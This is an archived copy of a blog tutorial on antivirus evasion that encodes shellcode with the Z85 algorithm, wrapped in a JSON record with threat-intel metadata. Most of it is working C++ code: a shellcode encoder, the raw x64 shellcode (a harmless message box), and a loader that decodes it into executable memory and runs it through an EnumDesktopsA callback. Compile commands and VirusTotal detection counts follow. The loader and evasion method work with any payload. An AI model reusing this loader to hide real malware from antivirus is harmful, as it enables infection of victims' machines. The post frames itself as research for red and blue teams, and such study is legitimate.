{
	"id": "7a677171-1f1e-4d16-b72a-e218c36b41e3",
	"created_at": "2026-04-06T01:29:23.616155Z",
	"updated_at": "2026-04-10T13:12:14.735139Z",
	"deleted_at": null,
	"sha1_hash": "9b8ff74f49e1b3a924032bf29aa7de597a86ba62",
	"title": "Malware AV evasion - part 8. Encode payload via Z85 algorithm. C++ example.",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1230439,
	"plain_text": "Malware AV evasion - part 8. Encode payload via Z85 algorithm. C++\r\nexample.\r\nBy cocomelonc\r\nPublished: 2022-07-30 · Archived: 2026-04-06 00:11:16 UTC\r\n3 minute read\r\n﷽\r\nHello, cybersecurity enthusiasts and white hackers!\r\nThis article is the result of my own research into interesting trick: encoding payload via Z85.\r\nSince the methods of encrypting the payload with the AES and XOR algorithms and encoding (for example, with the\r\nbase64 algorithm) have been studied with blue teamers quite well, the question arose to try to hide the payload in a\r\nnon-standard way.\r\nZ85Permalink\r\nAscii85, also called Base85, is a form of binary-to-text encoding used to communicate arbitrary binary data over\r\nchannels that were designed to carry only English language human-readable text. Z85 a format for representing binary\r\nhttps://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html\r\nPage 1 of 8\n\ndata as printable text. Z85 is a derivative of existing Ascii85 encoding mechanisms, modified for better usability,\r\nparticularly for use in source code.\r\npractical examplePermalink\r\nLet’s go to look at a practical example. First of all encode our payload via Z85 ( encode.cpp ):\r\n#include \u003cstdio.h\u003e\r\n#include \u003cstdlib.h\u003e\r\n#include \u003cstring.h\u003e\r\n#include \u003c./z85.h\u003e\r\n#include \u003c./z85.c\u003e\r\n#include \u003cwindows.h\u003e\r\nchar* encode(const char* src, size_t len) {\r\n // allocate output buffer (+1 for null terminating char)\r\n char* dest = (char*)malloc(Z85_encode_with_padding_bound(len) + 1);\r\n if (len == 0) {\r\n dest[0] = '\\0'; // write null terminating char\r\n return dest;\r\n }\r\n // encode the input buffer, padding it if necessary\r\n len = Z85_encode_with_padding(src, dest, len);\r\n if (len == 0) { // something went wrong\r\n free(dest);\r\n return NULL;\r\n }\r\n dest[len] = '\\0'; // write null terminating char\r\n return dest;\r\n}\r\nunsigned char payload[] =\r\n \"\\xfc\\x48\\x81\\xe4\\xf0\\xff\\xff\\xff\\xe8\\xd0\\x00\\x00\\x00\\x41\"\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\"\r\n \"\\x3e\\x48\\x8b\\x52\\x18\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x48\\x8b\\x72\"\r\n \"\\x50\\x3e\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\"\r\n \"\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\"\r\n \"\\xed\\x52\\x41\\x51\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x8b\\x42\\x3c\\x48\"\r\n \"\\x01\\xd0\\x3e\\x8b\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x6f\"\r\n \"\\x48\\x01\\xd0\\x50\\x3e\\x8b\\x48\\x18\\x3e\\x44\\x8b\\x40\\x20\\x49\"\r\n \"\\x01\\xd0\\xe3\\x5c\\x48\\xff\\xc9\\x3e\\x41\\x8b\\x34\\x88\\x48\\x01\"\r\n \"\\xd6\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\"\r\n \"\\xc1\\x38\\xe0\\x75\\xf1\\x3e\\x4c\\x03\\x4c\\x24\\x08\\x45\\x39\\xd1\"\r\nhttps://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html\r\nPage 2 of 8\n\n\"\\x75\\xd6\\x58\\x3e\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\\x3e\\x41\"\r\n \"\\x8b\\x0c\\x48\\x3e\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x3e\\x41\\x8b\"\r\n \"\\x04\\x88\\x48\\x01\\xd0\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\"\r\n \"\\x41\\x59\\x41\\x5a\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\"\r\n \"\\x59\\x5a\\x3e\\x48\\x8b\\x12\\xe9\\x49\\xff\\xff\\xff\\x5d\\x49\\xc7\"\r\n \"\\xc1\\x00\\x00\\x00\\x00\\x3e\\x48\\x8d\\x95\\x1a\\x01\\x00\\x00\\x3e\"\r\n \"\\x4c\\x8d\\x85\\x25\\x01\\x00\\x00\\x48\\x31\\xc9\\x41\\xba\\x45\\x83\"\r\n \"\\x56\\x07\\xff\\xd5\\xbb\\xe0\\x1d\\x2a\\x0a\\x41\\xba\\xa6\\x95\\xbd\"\r\n \"\\x9d\\xff\\xd5\\x48\\x83\\xc4\\x28\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\"\r\n \"\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x59\\x41\\x89\\xda\\xff\"\r\n \"\\xd5\\x4d\\x65\\x6f\\x77\\x2d\\x6d\\x65\\x6f\\x77\\x21\\x00\\x3d\\x5e\"\r\n \"\\x2e\\x2e\\x5e\\x3d\\x00\";\r\nint main() {\r\n char* str = encode((const char*)payload, sizeof(payload));\r\n if (str) {\r\n printf(\"%s\\n\", str);\r\n free(str);\r\n }\r\n return 0;\r\n}\r\nThen compile it:\r\nx86_64-w64-mingw32-g++ -O2 encode.cpp -o encode.exe -I/usr/share/mingw-w64/include/ -I/home/cocomelonc/hacking/cybe\r\nand run:\r\n.\\encode.exe\r\nhttps://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html\r\nPage 3 of 8\n\nAs usually, for simplicity I used meow-meow messagebox payload:\r\nunsigned char my_payload[] =\r\n // 64-bit meow-meow messagebox\r\n \"\\xfc\\x48\\x81\\xe4\\xf0\\xff\\xff\\xff\\xe8\\xd0\\x00\\x00\\x00\\x41\"\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\"\r\n \"\\x3e\\x48\\x8b\\x52\\x18\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x48\\x8b\\x72\"\r\n \"\\x50\\x3e\\x48\\x0f\\xb7\\x4a\\x4a\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\"\r\n \"\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\\xe2\"\r\n \"\\xed\\x52\\x41\\x51\\x3e\\x48\\x8b\\x52\\x20\\x3e\\x8b\\x42\\x3c\\x48\"\r\n \"\\x01\\xd0\\x3e\\x8b\\x80\\x88\\x00\\x00\\x00\\x48\\x85\\xc0\\x74\\x6f\"\r\n \"\\x48\\x01\\xd0\\x50\\x3e\\x8b\\x48\\x18\\x3e\\x44\\x8b\\x40\\x20\\x49\"\r\n \"\\x01\\xd0\\xe3\\x5c\\x48\\xff\\xc9\\x3e\\x41\\x8b\\x34\\x88\\x48\\x01\"\r\n \"\\xd6\\x4d\\x31\\xc9\\x48\\x31\\xc0\\xac\\x41\\xc1\\xc9\\x0d\\x41\\x01\"\r\n \"\\xc1\\x38\\xe0\\x75\\xf1\\x3e\\x4c\\x03\\x4c\\x24\\x08\\x45\\x39\\xd1\"\r\n \"\\x75\\xd6\\x58\\x3e\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\\x3e\\x41\"\r\n \"\\x8b\\x0c\\x48\\x3e\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x3e\\x41\\x8b\"\r\n \"\\x04\\x88\\x48\\x01\\xd0\\x41\\x58\\x41\\x58\\x5e\\x59\\x5a\\x41\\x58\"\r\nhttps://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html\r\nPage 4 of 8\n\n\"\\x41\\x59\\x41\\x5a\\x48\\x83\\xec\\x20\\x41\\x52\\xff\\xe0\\x58\\x41\"\r\n \"\\x59\\x5a\\x3e\\x48\\x8b\\x12\\xe9\\x49\\xff\\xff\\xff\\x5d\\x49\\xc7\"\r\n \"\\xc1\\x00\\x00\\x00\\x00\\x3e\\x48\\x8d\\x95\\x1a\\x01\\x00\\x00\\x3e\"\r\n \"\\x4c\\x8d\\x85\\x25\\x01\\x00\\x00\\x48\\x31\\xc9\\x41\\xba\\x45\\x83\"\r\n \"\\x56\\x07\\xff\\xd5\\xbb\\xe0\\x1d\\x2a\\x0a\\x41\\xba\\xa6\\x95\\xbd\"\r\n \"\\x9d\\xff\\xd5\\x48\\x83\\xc4\\x28\\x3c\\x06\\x7c\\x0a\\x80\\xfb\\xe0\"\r\n \"\\x75\\x05\\xbb\\x47\\x13\\x72\\x6f\\x6a\\x00\\x59\\x41\\x89\\xda\\xff\"\r\n \"\\xd5\\x4d\\x65\\x6f\\x77\\x2d\\x6d\\x65\\x6f\\x77\\x21\\x00\\x3d\\x5e\"\r\n \"\\x2e\\x2e\\x5e\\x3d\\x00\";\r\nThen, in the next step we put this encoded payload to our “malware”. I took the technique of running payload from\r\none of the previous articles:\r\n/*\r\n* hack.cpp\r\n* Z85 encode payload\r\n* author: @cocomelonc\r\n* https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html\r\n*/\r\n#include \u003cstdio.h\u003e\r\n#include \u003cstdlib.h\u003e\r\n#include \u003cstring.h\u003e\r\n#include \u003c./z85.h\u003e\r\n#include \u003c./z85.c\u003e\r\n#include \u003cwindows.h\u003e\r\nint main(int argc, char* argv[]) {\r\n BOOL rv;\r\n HANDLE th;\r\n DWORD oldprotect = 0;\r\n char e_my_payload[] = \"2@78z1[C\u0026K*\u003e*fqf06%EFp/pd\u003enhnL7nq*wNk1HPf7^pGGqxOd]I/ISTndSg4n\u003e?4Znhm]YjyJQsefEl{:QHJp.q:\u0026W\r\n char d_my_payload[314] = {};\r\n size_t d = Z85_decode_with_padding(e_my_payload, d_my_payload, strlen(e_my_payload));\r\n LPVOID mem = VirtualAlloc(NULL, sizeof(d_my_payload), MEM_COMMIT, PAGE_EXECUTE_READWRITE);\r\n RtlMoveMemory(mem, d_my_payload, sizeof(d_my_payload));\r\n EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, 0);\r\n return 0;\r\n}\r\nMany thanks to @artemkin for real-worked C/C++ implementation, also encoding/decoding with padding.\r\ndemoPermalink\r\nLet’s go to see everything in action. Compile our “malware”:\r\nx86_64-w64-mingw32-g++ -O2 hack.cpp -o hack.exe -I/usr/share/mingw-w64/include/ -I/home/cocomelonc/hacking/cybersec\r\nhttps://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html\r\nPage 5 of 8\n\nand run in our victim’s machine:\r\n.\\hack.exe\r\nAs you can see, everything is work perfectly :)\r\nLet’s go to upload hack.exe to VirusTotal:\r\nhttps://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html\r\nPage 6 of 8\n\nSo, 14 of 70 AV engines detect our file as malicious.\r\nhttps://www.virustotal.com/gui/file/6345f46e33919dd1e0691508a1f705d33ed44aadbdd1bb01a15fdad628b29fca/detection\r\nif you remember, this technique without encoding showed the result 16 of 66:\r\nhttps://www.virustotal.com/gui/file/657ff9b6499f8eed373ac61bf8fc98257295869a833155f68b4d68bb6e565ca1/detection\r\nWe have reduced the number of AV engines which detect our malware from 16 to 14!\r\nhttps://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html\r\nPage 7 of 8\n\nSo it can be assumed that evasion works.\r\nI hope this post spreads awareness to the blue teamers of this interesting technique, and adds a weapon to the red\r\nteamers arsenal.\r\nZ85\r\nhttps://github.com/artemkin/z85\r\nEnumDesktopsA\r\nsource code in github\r\nThis is a practical case for educational purposes only.\r\nThanks for your time happy hacking and good bye! PS. All drawings and screenshots are mine\r\nSource: https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html\r\nhttps://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html"
	],
	"report_names": [
		"malware-av-evasion-8.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775438963,
	"ts_updated_at": 1775826734,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9b8ff74f49e1b3a924032bf29aa7de597a86ba62.pdf",
		"text": "https://archive.orkl.eu/9b8ff74f49e1b3a924032bf29aa7de597a86ba62.txt",
		"img": "https://archive.orkl.eu/9b8ff74f49e1b3a924032bf29aa7de597a86ba62.jpg"
	}
}